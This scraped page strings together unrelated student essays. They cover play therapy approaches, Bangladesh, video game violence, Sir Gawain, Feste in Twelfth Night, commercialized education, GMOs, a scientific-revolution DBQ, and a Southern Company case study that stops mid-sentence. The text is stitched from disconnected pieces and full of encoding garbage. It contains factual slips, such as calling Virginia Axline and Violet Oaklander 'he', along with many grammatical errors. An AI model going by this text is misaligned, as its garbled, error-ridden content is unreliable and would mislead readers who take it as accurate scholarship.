therapy. Non-Directive Play Therapy ( who are the key people in NDPT and explain what you will discuss With over 60 years of influential work, Axlines contribution to non directive play therapy was outstanding. He is known as the founder of non directive play therapy and his work still influences play therapists in many ways. He believed the play therapist should have very little influence on the clients play and the client should communicate through their play, which is still a core principle today. The idea of reaching your full potential as a child in play therapy was originally proposed by Axline (1947). He explained the theory of progressing towards full potential occurs because of the formation of the therapeutic relationship, and not that of specialised techniques. Ray, Blanco, Sullivan, and Holliman (2009) support Axlines theory by stating the play therapists develops a relationship with the client by building on their acceptance.. In return, the client develops self-acceptance which results in moving towards their full potential. Today, play therapists continue to build on the foundations of non-directive approach guided by Axlines creative work, the area of non-directive play therapy continues to progress, more than 60 years later. Client-centred play therapy. Developing the ideas of Axline (1947) and Moustakas (1959), Landreth (2002) improved their theories to develop client centred play therapy. In Play Therapy Virginia Axline (1947/69) suggests that the individual has within himself the ability to solve his own problems, and that in play therapy, where conditions for growth are optimal, the child reaches for independence (Axline, 1955). She expressed the importance of the therapist to allow the child to explore and investigate the room and toys with his own initiative with support of the experience and the relationship (Axline, 1955). Star this section from Moustakas Moustakas (1959) felt children required the need to feel they were understood gain self directed skills in order to grow. These skills could be achieved through client centred play therapy, focusing on the clients direction throughout the session. Astramovich (1999) supported the client centred therapy approach stating it focuses on the growth and development of the child, and this can be achieved by the child directing their own play through the session. Directive Play Therapy Explain to the reader what approaches you will cover: McMahon (1992) states directive play therapy aims to prepare children for an event that is about to occur, for example surgery or other unpleasant events. Directive play therapy works towards treating the childs anxieties they may be unaware of. McMahon (1992) suggests the directive approach is closer to psychotherapy than to Axlines non directive theory. She elaborates on the therapist having the skills to deal with unexpected circumstances which may arise, and always be prepared and accept the childs response. Oaklander (1978) holds that there are the benefits of fantasy and projective methods to use in directive play therapy. He suggests asking children to draw their family as symbols or animals, directing their play to observe their emotional needs. The use of Gestalt methods is expanding over time, the theory behind this approach is beneficial to the child to deal with their feelings they are experiencing at the present, instead to going too far back towards traumatic experiences (McMahon, 1992). Cognitive Behavioural play therapy Cognitive behavioural therapy (CBT) is a form of psychotherapy originally developed for adults, and aims to identify and modify negative thinking styles that cause negative emotions and the maladaptive behaviours associated with those thinking styles (Knell Dasari, 2009). Cognitive behavioural play therapy is a sensitive approach seen to be effective when working with children based on CBT from 8 years and above with various disorders. Cognitive behavioural play therapy is used to teach children strategies to change their negative thinking and views in order to develop positive thinking and understandings (Knell Dasari 2009). Green (2008) elaborates on the various styles of the cognitive behavioural approach used within play therapy including, changing their cognitive development, discussing and eliminating senseless beliefs or ideas and cognitive misrepresentations. The play therapist modifies the cognitive behavioural therapy to suit the needs of the child within play therapy. Gestalt play therapy Gestalt play therapy, according to Oaklander (2001), focuses on the holistic views of the child, including their body, their emotional state, and their mind. Gestalt Play therapy focuses on the childs ability to understand how to express their emotions and is essential for a healthy understanding of their own emotions. Oaklander (2001) supports his theory by developing a variety of ways to express ones emotions. Oaklander (2001) suggests clay, art, crafts and puppets to help assist the expression of emotions through play in a directive manner. The Gestalt work focuses on the what and how rather than the why as found (Oaklander 2001) found. Alderian Play Therapy Within Adlerian Therapy, the therapist focuses on and examines the lifestyle of the client and tries to form a relationship of respect and trust with the client in order to set and reach their goals. Adlerian play therapy is a little different as it sets out to appeal to the child but is focused on the Adlerian method just in a child friendly manner. (Morrison 2009). Kottman (2001) suggests Adlerian play therapy may use techniques from non- directive and focused play therapy in order to the help the child build confidence, courage and abilities by using the Adlerian play therapy method. It is believed within the Adlerian method behaviours carried out by the client are intentional and by using the Adlerian method of play therapy, children can learn to develop coping mechanisms and strategies as suggested by Kottman and Warlick (1989). Psychoanalytic play therapy Melanie Klein, Anna Freud, studied under the Freudian psychoanalysis each developing their beliefs. Both individuals had a major influence of the development of psychoanalytical play therapy Melanie Klien believed all play was symbolic; in contrast to this Anna Freud believed it was the replay of real life events. Anna believed play therapy was allowing children to talk about the conscious feelings and thoughts and to act out the unconscious; however Klien in contrast to Anna Freud made interpretations from the unconscious meanings to from their play and felt strongly this was the correct understanding (McMahon 1992). Freud argues for the importance of building a relationship between the therapist and the client in order to provide adequate therapy to the client. She did not believe in interpreting the clients play until the relationship was developed amongst both parties (Cattanach, 1992). Klien argues against Freud, emphasising the importance to begin interpretation without the foundations of a relationship with the child resulting in delays to the therapy (Cattanach, 1992). Parental / Primary Carer Involvement The input and involvement of the primary carer is significant when providing Play Therapy to Children. Involvement provides positive outcomes to both the therapist and the child. The therapist can receive back ground information of the problem, the events and behaviours, the primary carer can provide the therapist with information in relation to the childs progress. Primary carer involvement provides security, stability and emotional support for the child if the therapy may become distressing for the child. A parents emotional availability is suggested to be the tool to success of Play Therapy (Wilson Ryan, 2005) Primary carers may be unaware of what Play Therapy is, and how it is used. As the primary carer brings the child to the centre weekly it is suggested that the therapist should provide adequate information and assistance in relation to the treatment and their part in the therapy (Wilson and Ryan 2005). The therapist should ensure they dont replace the parent child relationship although their relationship is significant for successful results and progress. Play Therapists can involve parents in a variety of ways, for instance the therapist can ask for the parent to sit in on the therapy to assist the settling period, therapist provide feedback to the parents, after each session or after a particular period of time. This can allow therapists provide parents with advice and ideas of how to bring the therapy into the home and provide consistency (Landreth, 2001 and McGuire McGuire, 2001). Training There are independent organisations that within their own country have their own play therapy training; however they adopt the standards of Play Therapy Internationals standards. Their training is recognised and certified. Play Therapy Ireland, Play Therapy United Kingdom and Play Therapy Canada are well developed and link with Play Therapy Ireland through their practice. Other countries are gradually developing their own Play Therapy International standards. The Childrens Therapy Centre are the only APT approved provider in Ireland. Their courses are recognised by the Irish Association for Play Therapy and have approved quality assurance standards with both FETAC and HETAC. Conclusion In this chapter a review of the current literature relating to play therapy was addressed. I will present a small scale study carried out on the perception of Play Therapists. In the next chapter I will outline and discuss methods for gathering data for this study. A

Thursday, September 19, 2019

The Empowerment of Women through Education Essay -- Essays Papers

The Empowerment of Women through Education I’m embarrassed to admit that I had to look up Bangladesh on a map when I found out I was accepted to the program â€Å"Development and Community in Bangladesh.† Obviously, I knew very little about the country, it’s history, it’s economy, it’s political system, it’s religion, and it’s cultural practices. Though in the beginning this seemed to be a great disadvantage to me, it has provided me with a great opportunity to learn about Bangladesh and form my own opinions from my experiences rather than from preconceived stereotypes. Bangladesh is located in Asia, surrounded by India on three sides and the Bay of Bengal on the other. It is on the tropic of cancer and thus is very lush. It is home to seven major rivers, including the Ganges, which flows into the Bay of Bengal, and two hundred minor rivers. Rivers are the most important geographical aspect of Bangladesh because it is such an agriculturally based society. They are also one of the most dangerous natural elements because of flooding in the monsoon season. Thousands of houses are destroyed each year because of flooding and other natural disasters. There are two hilly areas: the hills of Assam and the Chittagong Hill Tracks. Bangladesh is also home to vast rainforests, marshes, and swamps. It has six seasons: griishmo (summer), borsha (rainy), shorot (autumn), hemonto (harvesting), shiit (winter), and bosonto (spring.) Three seasons are truly discernable; the monsoon season, the cold season, and the hot season. The seasons are fairly self-explanatory, y et my mental image of each of the seasons was very different from reality. Coming from the mid-west of the United States I’m used to very cold winters and relatively warm summers, wit... ...elopment around the World: Practice, Theory, Research, Training. Buffalo: University of Toronto Press, 1997. Gardner, Katy. Songs at the River’s Edge. London: Pluto Press, 1997. Murray, Jon. Newton, Alex. Plunkett, Richard. Wagenhauser, Betsy. Bangladesh. London: Lonely Planet Publications, 2000. 1990 Bangladesh Census Report Chittagong is a district in Southeast Bangladesh. The Bangladesh Nationalist Party takes a strong anti-India stance and is more nationalistic. The Awami League is broader in its contingency. It represents more of the minorities. A hartel is a strike. A burqua is a â€Å"cape which covers the whole body, with a veil for the face; worn by women in Muslim countries to hide themselves in public.† (Gardner, 146.) bari: â€Å"homestead, a collection of households at one site, which are usually all of the same lineage.† (Gardner, 145.)

Wednesday, September 18, 2019

Children and Video Game Violence :: Entertainment Papers

Video game systems are the basis for much discussion and argumentation in today’s society. They have been around since the 1970’s and have allowed children to pass the time with an interactive way to leave this world and enter a new realm of imagination, where the creators of the games set the only guidelines. Children are allowed to see themselves as characters with amazing powers and the ability to do many things. Many critics, however, worry children are not physically capable of understanding that games are not reality, and, therefore, cannot realize, in the real world, one cannot commit the acts they do while playing video games. Violence, for example, is found in more than half of all video games. People worry that children who constantly view violence in this manner will learn to see violence as a proper action without any consequences. My paper is organized in a manner which allows you, the reader, to view and understand the points of many authors and their works without having to read them in a boring, straight information, textbook form. First is the dinner meeting, in which all of the authors of my sources came to my house for dinner and discussed much of their thoughts about these games. Following the dinner is my summary and analysis of their works, and, finally, my input and beliefs on the subject of the negative effects of video games on children. The table was set, and the food was out. The lights were low in my dining room as the chairs were set around my hardwood, darkly stained table with a burgundy tablecloth. The light reflected off of the side of the turkey breast, and the light rays bounced around inside the glass bowl containing green beans. No, it is not Thanksgiving dinner, but a nice meal for the writers of several sources on the topic of the effects of video games on children. Although the dark green walls of my rectangular dining room do not echo any sounds now, I know the room will soon be filled with loud debates and harsh discussions on a topic with which I am becoming more familiar. As the guests began to arrive, I did not know what to expect. The representatives from ABCNews were dressed like reporters: the women in business suites and the men in ties.

Tuesday, September 17, 2019

Sir Gawain And The Green Knight Essay -- essays research papers fc

Sir Gawain and the Green Knight: Sir Gawain Faces Temptation   Ã‚  Ã‚  Ã‚  Ã‚  Sir Gawain was known as a noble and honest man who was willing to stare death in the face to protect King Arthur. However, the courtly Sir Gawain is submitted to the unexpected—not to the test he expects, but to one he does not expect (qtd. in Spearing). The underlying theme throughout the entire poem is temptation, which, is Sir Gawain’s greatest challenge because he is not aware of it.   Ã‚  Ã‚  Ã‚  Ã‚   He faltered not nor feared   Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  But quickly went his way,   Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  His road was rough and weird,   Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Or so the stories say. (qtd. Stone 47)   Ã‚  Ã‚  Ã‚  Ã‚  Sir Gawain stands up just as the Green Knight challenges King Arthur. Gawain saves his uncle from the humiliation the Green Knight imposes on the King from his badgering; for this Gawain is very brave. He has no fear in approaching the Green Knight and accepting the game. Sir Gawain was a man who was held in high esteem before the people at Camelot. Thus, he was given the title Sir Gawain, which sealed his noble existence. A knight is a man who, for some achievement, is given honorary rank and thus entitling him to use Sir before his given name (qtd. in Webster’s pg. 747). Berry 2 King Arthur was a very honorable man, one with boyish spirits and youthful persona. The King also displays his humble nature when at the table, he refused to begin eating before any of his guests. However, when the Green Knight confronts him he does not cower before him.   Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  He raged as roaring gale;   Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  His followers felt the same.   Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  The King, not one to quail,   Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  To that cavalier then came.   Ã‚  Ã‚  Ã‚  Ã‚  The Green Knight was described as a handsome, muscular man. Because every article of clothing the Green Knight wore was green, including his skin and hair, he is reminiscent of a fertility god. This idea of a fertility god plays a role when introducing the theme of temptation on the behalf of the Lord’s wife... ... of his fault must itself be viewed with amusement, as part of his human fallibility.† (Borroff, Introduction) He expects (and we expect with him when we first read the poem) that the real test he has to nerve himself for is meeting the Green Knight at the Green Chapel and receiving a presumably mortal blow from his axe. But when, after a tremendous effort of will, he does bring himself to face the Green Knight and accept the blow, it turns out that this is not the test itself. This test is only the symbol of a previous test which was carried out by the Green Knight’s wife, and which Gawain has already failed, marked by the girdle he accepted as a gift.   Ã‚  Ã‚  Ã‚  Ã‚  Berry 5 Works Cited Abrahms, M.H. The Norton Anthology of English Literature. New York: W.W. Norton & Company, Inc., 1993. Borroff, Marie. Sir Gawain and The Green Knight: A New Verse Translation. New York: W.W. Norton & Company, Inc., 1967. Spearing, A.C.. â€Å"Patience and the Gawain-Poet.† Twentieth Century Interpretations of Sir Gawain and the Green Knight. Ed. F. Denton. Englewood Cliffs: Prentice-Hall, Inc., 1968. Stone, Brian. Sir Gawain and the Green Knight. New York: Penguin Group. 1959.

Monday, September 16, 2019

Twelfth Night – Feste’s self

Feste is an observer. He sees through people. Though he's a kind of entertainer, who will only perform for money, what he chooses to sing to people is intentionally relevant and disturbing to them. People find the truth very hard to deal with, for example, ‘Peace, you rogue†¦here comes my lady'. This story shows people avoiding the truth at every level. Especially since they are being called ‘fools' or ‘clowns', and not really taken seriously. For example, the fool in King Lear was constantly being threatened with hangings and beatings, but this was only as he was a ‘witty fool'. Again with Feste in Twelfth Night, who also is threatened with hangings, due to his absence. But Feste does not fear this threat, and in fact makes a joke of it; mocking Maria and using a sexual pun at the same time. This confidence comes from the fact that it wasn't their job to simply provide amusement, but also to make critical comments and provide advice, as Olivia asks him: ‘What's a drunken man like, fool?'. And because he is an ‘allowed fool' he was able to say what he thinks, without fear of punishment, ‘there's no slander in an allowed fool'. Since the only relationship that involves Feste, is that between Olivia's family, he has the ability to mediate between the whole cast. He is regarded as a close friend to Olivia, ‘What is a drunken man like, fool?', as well as Sir Toby, by engaging in their ‘folly' and songs. But he also has the ability to distance himself from everyone when needs be. Because he is constantly mocking people with puns and soliloquy, the audience gets the feeling that he doesn't really feel close to them. A well as being incredibly comic, Feste is probably the most perceptive character in the play. He comments on people in ways other people over look, whether be their appearance or their ‘mind'. For example, in Act ii: iv, he point blank tells Orsino what he thinks of him, saying his ‘mind is very opal' and ‘the tailor make thy doublet of changeable taffeta' (a silk which changes colour). The joke here is Feste telling Orsino that he is very fickle and has a very changeable mood, so changeable that he should have matching clothes. He then goes on to say that he is so changeable that he would sail around the world to justify purposeless busyness. Feste hardly knows Orsino, who in turn scarcely knows Feste, but for Feste to cast this view shows his perceptiveness. This view is so accurate, that it leads Orsino to make Cesario go to Olivia's and tell her that his love is ‘more noble than the world'. Furthermore, he also suspiciously notices Viola, and is the only one start suspecting her, ‘send thee a beard' he says, hinting that he knows of her ‘such disguise'. Feste's perception was depicted in Trevor Nunn's production of Twelfth Night, where he has Feste give Viola a necklace. A necklace that she abandoned in Act 1 scene 2, on the seacoast, showing that he has always known of Viola's situation. This interpretation of Feste means that throughout the play, Feste has always known of Viola's situation and was always playing along, again showing his nature. Feste's Language: Feste has a very sophisticated way of speaking that allows him to climb up and down the social ladders of Illyria and be able to talk with Lord Orsino, Sir Toby and Fabian. This becomes significant when he is able to get himself out of situations or even to make other people react, which may otherwise be tricky and use his language skills to make mockery. Such as the ‘the more fool, Madonna, to mourn for your brothers soul†¦' a. This is the first scene that he is present in and he immediately proves Olivia to be a ‘fool'. This kind of humour was taken kindly by Olivia and an Elizabethan audience would of enjoyed it more. However, Feste has proved two things here, the first is that he is not ‘dry' and the second that he can provide the humour if is someone does ‘minister occasion to him' or invites him to ‘make that good'. By getting set up for this comedy, or getting invited, the audience would get ready and find the punch line slightly more comical. Another key figure of Feste's language, are his uses of Latin. He talks and refers a few times in Latin, and all times, he is either talking to Olivia or Orsino. This again proves his versatility talking appropriately with people and it also shows the audiences his education. All his Latin sayings convey messages. For example, the first, to Olivia, ‘cucullus non facit monachum', which refers to an overriding theme in the play; don't judge by outward appearances, as if preparing her for his foolery. The last Latin reference is to Orisino in Act 5. ‘Primo, secundo, terito is a good play†¦', here simply begging for a third coin. Feste's songs do hold a dramatic function, and depending on the scene, the dramatic function changes. One of the most dramatic things, are the songs that he sings. The are not just for entertainment, but they hold meaning and are sung for a reason. Such as when Feste asks ‘would you have a love song or a song of good life'. He feels as though he has to please; it's his duty as a fool, and his song will reflect the audience's mood at this current moment in the play. Or as he said in his final song at the end of the play ‘†¦And we'll strive to please you every day.' The meanings of Feste's songs, are always significant. They are either used to create dramatic effects or represent/ echo his feelings about a situation or a scene. In Act 2, Feste sings ‘Come away, Come away, death†¦', a melancholy song to Orsino about a lover who dies for love, which echoes Orsino's mood and his situation. The listener can read into this as Orsino being the lover and Olivia being the ‘maid', making sense as the lover is ‘slain'. The words that are used mirror what Orsino has already said, such as ‘My part†¦share it' hold similar meaning to that in ‘If music be the food of love†¦'. Orsino then immediately acts on the song and tells Viola/ Cesario to go to Olivia's. This is one example of the role of Feste; do we value what he says or laugh at what he says? Here, Orsino values what he says, we know this as he sends Viola to go to Olivia and tell her ‘that nature pranks her in attracts my soul' not her money. However, after the song is sung, Feste then casts a point blank opinion, face-to-face of Orsino. This creates a lot of tension, especially with the use of words like ‘pain' and ‘..bones shall be thrown'. Here is a good example of the dramatic significance of Feste; as this scene ends in tension. This is the part where Viola nearly reveals of her true love for Orsino, and the audience think that Viola might reveal who she really is, so the audience are anticipating and waiting for Viola's next words . And the next scene starts in comic humour. The drama in each scene seems heightened due to the massive contrast. At the end of the play, Shakespeare provides what seems to be an epilogue, like other plays, such as A Midsummer Night's Dream and All's Well That Ends Well. However, unlike these, Feste sings it. The song is about Feste growing up, about being tolerating in childhood, rejected in adult hood, unsuccessful in marriage and drunk in old age†¦but nothing really matters, the actors will always try an please. Although this song is about Feste, the overall meaning of it reflects the whole play. For example, he talks about himself growing up with bad experiences, his life circle from childhood to being an old man. This is a slight re-iteration of a song he sang earlier: ‘What is love†¦youth's a stuff will not endure', This song is telling the audience that we should enjoy the present because nobody can know what the future holds, it could be good e.g. Viola-Orsino and Sebastian-Olivia, or it could be terrible e.g. Malvolio. Feste uses word play frequently throughout this play. These word plays, or puns, can make the audience laugh or even add to the tension so far. A good example is in Feste's first scene: ‘he that is well hanged in this world needs to fear no colours'. The first interpretation of this pun, is the word ‘colours' which can mean enemy or war. So, logically, someone who is already dead, can't fear. However, an Elizabethan audience could of heard it as ‘collars' (meaning noose or hangmen's nooses) so they don't fear them. The Elizabethans enjoyed such punning jokes, and the pun itself would relax the mood. With Maria threatening Feste with death, and then Feste making the whole audience laugh. This is an example of the dramatic significance of Feste. The role of Feste: Feste's appearance in the play is held off until the fifth scene of act I. In this scene the reader is introduced to the clown through a conversation with Maria. In this scene his contribution to the play is revealed through: â€Å"Wit, an't be thy will, put me in good fooling! Those wits that think they have thee, do very oft prove fools, and I that am sure lack thee may pass for a wise man†¦better a witty fool than a foolish wit†. These lines indicate that Feste's presence is not merely comic relief through foolish acts and show that the role of the fool requires much intelligence, or being a ‘wise man'. Feste's contribution to the exposure of underlying themes of love is essential to the understanding of the play's messages. The clown's most profound comments often take the form of song: ‘O mistress mine, where are you roaming?†¦Youth's a stuff will not endure.' It's in this song where we could possibly see Feste uncovering viola, ‘Trip no further, pretty sweeting;', where the ‘pretty sweeting' may be Viola, and the ‘wise man's son' is Feste. If this is so, then it suggests that Viola-Orsino may end up as ‘lovers'. This song is performed due to the requests of Sir Toby and Sir Andrew for a â€Å"love-song.† The song plays on the events of Twelfth Night itself. The song echoes the cheerfulness of this play and how the uncertainty of ‘what's to come' shouldn't be a negative prospect as ‘there lies no plenty'. Feste also foresees events that will occur later in the play. When he speaks of journeys ending â€Å"in lovers meeting,† he hints at the resolution in which several characters are married. Feste's intuition is comparable only to the perception of Viola. Because both characters are the only ones who are involved in both houses, Orsino's and Olivia's, they rival each other in their knowledge and putting their wits against each other. Namely act3:i, where, they both delight in using word play, ‘a sentence is but a cheveril glove to a good wit-‘ and later Viola saying ‘I understand you sir', as if showing him that she is clever. Apparently, Viola is the only character who recognises Feste's true intelligence: â€Å"This fellow is wise enough to play the fool, and to do that craves a kind of wit†¦but wise men, folly-fall'n, quite taint their wit†. This shows Viola's awareness of Feste and his ability to read people in order to say the right thing at the right time. Through this keen observation by Viola, she is perhaps acknowledging that the clown might even have the ability to see through her own disguise. Although Feste never openly claims to know of Viola's deceptive dress, it is indicated that he might be on to her: â€Å"Now Jove in his next commodity of hair send thee a beard†. He's used to change the audience; if Shakespeare wanted to portray thoughts or morals, he would do so with the puns and songs Feste tells the audience. For example, Act 1:v, he says: â€Å"many a good hanging prevents a bad marriage† communicates as if you are well ‘hung' then you need not love. And if we look back, to Act 1, the Latin quote refers directly to how Shakespeare felt. So, it is possible that Feste was the voice of Shakespeare, and if Shakespeare wanted to make the audience happy, for dramatic effect or other, then he might use Feste to sing a song. And when Feste says lines 359-354 in act5:i, he quotes the things that Malvolio has said, and a feeling of ‘what goes around comes around'. This putting down of Malvolio would of been particularly enjoyed by the audience, because of his puritan nature. So by Feste putting down and mocking of Malvolio's nature would of caused great humour. I detected this in act 2:iv, where we are faced with a melancholy ending about love and ‘passion' then straight after, we see the trap that is set for Malvolio. This comic scene gets enhanced because the mood of the preceding scene was sorrowful and sad, but the beginning of this one is very jovial. The plot in Twelfth Night is very convoluted. This is why fools might of been used in such plays as ‘King Lear', ‘All's well that ends well' and ‘Two gentlemen of Verona'; to underline and reinforce important parts of the plot to the audience, and make their songs and folly draw parallels to the play. For example, in Twelfth Night, Feste sings to Malvolio ‘†¦She loves another'. As if, Feste has seen through Malvolio and knows of his affection for Olivia, and crudely tells him there is no likelihood for him, moreover, he already must know of Olivia's affections for Viola. With the indictment of Malvolio and other happy endings in the form of marriages, the future seems delightfully optimistic, Feste's final song lessens the hope of a completely happy ending. The refrain of this song, which states â€Å"the rain it raineth every day,† insinuates that at any time the happiness that now occupies the characters in Illyria could at any time be swept away. The song as a whole seems to show maturation from innocence to experience and through this development was a continuum of â€Å"the wind and the rain.† With this song, Feste seems to suggest that even as a person goes through life, with its ups and downs, he or she must remember that at any time one can end up in an unfamiliar place with a completely different life, exactly like Sebastian and Viola. There will always be unpredictability, as long as there is ‘wind and the rain'. Ironically, Feste is the only person not to be seen as the fool. Olivia is the fool, as she has fallen in love with a woman, Orisino is seen the fool, because his Viola has tricked him into thinking she is a man. Sir Andrew comes across as the fool because of his foolish remarks, like taking the word ‘ass' literally and believing ‘Pigrogromitus'! This irony will add humour and dramatic irony to the audience and again make Feste look the cleverest by default. By acting the ‘fool' he comes across as the wise man he is. The ‘Twelfth Night' was know as the â€Å"Feast Of Fools†, which is very similar to â€Å"Feste the Fool†. This seems extremely significant, due to the similarity, as the Feast of Fools always appointed a â€Å"Lord Of Ridicule†. It is possible the an Elizabethan audience would of got this (intentional) similarity and therefore see Feste as this Lord Of Ridicule. If Feste was this lord, then he would become the master of the household, for this short holiday period, and organise dances, folly, pranks and deceptions, in order to entertain the rest of the household. If this case, it would then explain Feste's songs, drunkenness, writing of letters to Malvolio and of course dressing up as Sir Topas.

Sunday, September 15, 2019


Shayna Powell GMO: Helpful or Harmful? The battle about genetically modified food is intensifying more and more each day as to whether it is doing more harm than good to the health of the environment and the general population. While there is some potential for a successful GMO world, there are far too many risks and safety factors involved. The factors include the unknown consequences of eating GMOs, the effect of genetic engineering on the environment and genetic diversity, and the massive amounts of herbicides, pesticides, and fungicides required in GMOs.These products are unsafe, unnatural, and have the potential to cause irreversible damage in the future. Others who disagree might argue that GMOs increase food supply, tolerance of harsh environmental conditions on crops, and pest and disease resistance. While these arguments may have some validity, the idea that these products can be very unsafe and damaging cannot be excused because of these pros. First, genetic engineering can reduce genetic diversity. Plants with reduced genetic diversity cannot handle drought, fungus, or pests as well as natural plants can.GMOs strengthen homogeneity and increase the vulnerability of crops to environmental changes. There is also a concern for the spread of altered genes to weeds and other wild relatives creating â€Å"super-weeds† that will be resistant to herbicides found in GMOs. This in turn would defeat the purpose of genetically engineering crops. In the end, the GM process will be more costly to farmers and agriculture itself. In addition, GMOs require massive amounts of herbicides, pesticides, and fungicides.According to Mark Anslow, Ecologist Editor, â€Å"no genetically modifies crop has yet eliminated the need for chemical fertilizers in order to achieve expected yields. † (Anslow, 464) Also, these chemicals are poisonous and should never be eaten. Why then would companies such as Syngenta and Monsanto find it safe for humans to ingest such pois on? Finally, the consequences of eating GM products are widely unknown. Experts say that 60 to 70 percent of processed foods have ingredients that have been genetically modified. That means that most breakfast cereals, snack foods, some baby foods, sodas and oils are being consumed without known risks.In addition, food items that contain GMOs are not labeled in America. According to Jeffrey Smith â€Å"altered nutrients and toxins can result in developmental problems. † (Smith, 471) This has resulted in the nutritional studies on young and developing animals. However humans are very different from animals and could have far different reactions than those shown form tests done on animals. In order to prevent future disasters, long-term studies of biotech foods should be conducted to determine long-term effects. In conclusion, too many risk factors exist for GMOs to be overlooked as a harmless biological advancement.Studies should be done overtime to reveal what effects genetic ally engineered food can have on the environment and the consumers in the future. While trying to make a â€Å"quick-fix† in the shortcoming of nature, responsible actions should be taken to ensure the safety and well-being of those partaking in the GMO movement. Works Cited Anslow, Mark. â€Å"Ten Reasons Why GM Won't Feed the World. † Good Reasons with Contemporary Arguments Smith, Jeffrey. â€Å"Another Reason for Schools to Ban Genetically Modified Foods† Good Reasons with Contemporary Arguments

Ap World Histroy Dbq

DBQ Political, religious, and social factors affected the work of scientist in the sixteenth and seventeenth century in many ways. They were the reasons why natural philosophers questioned, studied, and continued to find new information in their discoveries. Developing a new scientific worldview must have required an abundance of controversy dealing with these important factors. There were people who believed that the discoveries made should not interfere with political power. *Thomas Hobbes, an English Philosopher, certainly believed in many theories’ that scientists had viewed. However he is best known for his political thought.Certainly his political views were included in his scientific works (Doc 7). Louis XVI, a political power, showed interest into the scientific studies. This evidently showed on a drawing to honor Louis XVI’s visit to the French Royal Academy (Doc 10). Clearly, science was encouraged to flourish because people knew the happiness of the country, for not only depending on the arms abroad but for also creating abundances at home (Doc 11). The social factor was furthermost likely to have been more analyzed in scientist works. Many were interested in what people thought of them and their studies.Scientist were even more proficient in removing their experiments completely if people disagreed. Marin Mersenne guaranteed that his experiments had been repeated more than 100 times, but however was willing to change them if someone did not agree. Others however, were confident in their studies and did not care for much criticism (Doc 1). The reason for why natural philosophers were sometimes held back was because they truly did not know what their objective was. This is most likely why they made slight progress in the sixteenth and seventeenth centauries (Doc 4). Religion was unquestionably a factor scientist considered.They took the principles of God into their works. It appeared impossible to them how things could have so much aston ishing features and qualities and still have been created out of nature. They knew these things became to exist from an immeasurable wisdom and power (Doc 8). Just as God governs minds, minds have specific laws which place them above the moments of matter (Doc 12). Bible stories were used as comparisons with scientific views, such as John Calvin mentioning Moses who wrote in a popular style where all ordinary persons gifted with common sense and were able to be understood (Doc 2). He is a French Protestant theologian which may be what leads him to trust that astronomy unfolds the admirable wisdom of God. There were those who were not affected with political, religious, and social factors because they were limited on human rights. Women had certain difficulties in the scientific area. Margret Cavendish would have set her own school of natural philosophy if she would have not have feared the casting of a male school. *Margaret, a natural philosopher, was certainly interested in discov eries however, she understood the complications of having a part in this grouping (Doc 9).Studies should have been allowed from those who wished to learn, as well as those who selected to reject whatever is unidentified to them (Doc2). Both genders could have formed a friendship between intelligent associations; this would have been a great aid to the investigation and education of the truth (Doc 6). Political, religious, and social factors were massive topics. Natural Philosophers certainly were aware of their process of studies and experiments. They all had different views on the three factors causing old and new discoveries to be more interesting.

Saturday, September 14, 2019

Commercialization in Education Essay

Short Essay on Commercialization of Education â€Å"No, I want my child to study. I want him to get what I did not get in my childhood. I will give him education even if I have to pay a huge amount of money to the educational institutions† These are some lines which are said by the parents of this modern era. Every parent tries their level best to provide quality education to his ward and to fulfill their dreams they spend a lumpsum amount of money so that their ward is able to  study in the best educational institution. Schools, coaching centers, educational institutions, etc. , are prospering day by day. It seems as if they will give rise to a new industry named  educational industry. They charge lumsum amount of money to provide education and the parents blindly spend such amount to educate their ward. But the question is– ARE THESE INSTITUTIONS PROVIDING EDUCATION OR THEY ARE DOING BUSINESS IN THE NAME OF EDUCATION In this modern era, EDUCATION is no more giving knowledge or teaching a child so that he/she can know more and more about the society. Rather it has converted into a business in almost every institution charge a huge amount in return of the facilities they provide. In the best educational institutions of the world, donations are taken in return of registering an average student and giving him education. Advertisements made by the schools, colleges, coaching’s, etc. is a way of getting more and more customers in form of students and surely their business is prospering day by day. Basically the parents are being cheated in the name of education. Even if it gives rise to a new industry, this industry will not be able to fulfill its social responsibility towards the society. The system of education in the world has to improve; the meaning of education has to improve. Providing education should not be limited to providing lumsum amount of money. The meaning should be giving quality education to the youth to develop the world. This is not what â€Å"I† as an individual or â€Å"you† as an individual can do. For this many â€Å"I† have to come together to give rise to a â€Å"we† and this â€Å"we† will be able to convey this message to the world.

Friday, September 13, 2019

Southern Company Case Study Example | Topics and Well Written Essays - 1250 words

Southern Company - Case Study Example Therefore, they fail to achieve desirable management of talent in the organization. Finally, the Southern Company has functional expertise, which increases the chances of the company identifying appropriate human resources for its electric utility activities. â€Å"Evaluate the effectiveness of the roles that the strategic leaders played in the formation of the performance management strategy†. There was a deliberate improvement in the entire leadership of the company. The improvement was strategic because it enabled the corporation achieve better achievement. Consequently, the effectiveness of this step to empower leaders concentrated on the suggestions in management books. â€Å"The Leadership Pipeline†, is a book that encouraged Southern Company leaders to diversify their strategies. The leaders also determined the respective results that they needed to achieve in order to improve performance (Kandula, 2006). Indeed, this strategy was effective because it enabled the strategic leaders to form desirable and applicable strategies in managing their respective talents. In addition, the strategic leaders ensured there was an implementation of a plan that would increase their performance. For example, the plan entailed the formation of certain guidelines. Consequently, the guidelines focused on how to improve the performance of management. The effectiveness of this strategy was the creation of order in the delivery of managerial responsibilities. For example, the guidelines would reduce any confusion from lack of sufficient preparing (Goldsmith, Marshall, Carter, Louis, & B.P.I, 2009). Other efficiencies of the roles played by the strategic leaders include preparing for future talents by identifying potential successors. This strategy enabled the management of Southern Company to determine the nature of talent they had during operational periods. This is because the strategic leaders encouraged willing human resources to agree to certain leadership p ositions in the future. Additionally, there was enhancement of performance because of the requirement to state the time that an individual was ready to perform diverse tasks. Moreover, the human resources of Southern Company work hard to achieve the required experience for promotions in the organization. This is effective because the strategy forces employees to increase their respective competencies. In particular, the management of Southern Company used its leaders in diverse departments to increase the performance of the entire company (Armstrong, 2011). â€Å"Develop a five (5) point 